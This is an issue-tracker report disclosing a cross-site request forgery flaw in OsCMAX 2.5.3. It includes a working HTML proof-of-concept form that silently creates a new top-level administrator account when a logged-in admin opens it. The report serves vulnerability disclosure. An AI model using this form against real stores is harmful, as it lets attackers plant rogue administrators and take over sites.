We're updating the issue view to help you get more done. 

CSRF add admin user

Description

Hello,
OsCMAX 2.5.3 suffers from a cross site request forgery which allows the attacker to add a user.
CWE-352

1 2 3 4 5 6 7 8 9 10 11 12 13 <html> <form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1"> <input type="hidden" name="admin_username" value="THETUNISIAN"/> <input type="hidden" name="admin_firstname" value="Moot3x"/> <input type="hidden" name="admin_lastname" value="Saad3x"/> <input type="hidden" name="admin_email_address" value="g4k@hotmail.esxxx"/> <input type="hidden" name="admin_groups_id" value="1"/> <!-- About "admin_groups_id" --> <!-- 1= Top Administrator --> <!-- 2= Customer Service --> <input type='submit' name='Submit4' value="Agregar"> </form> </html>

The attacker can send a link to the admin, so an admin user will be created

Environment

Steps to reproduce

None

Status

Assignee

Michael Sasek

Reporter

g4k

Severity

Major

Components

Affects versions

v2.5.3

Priority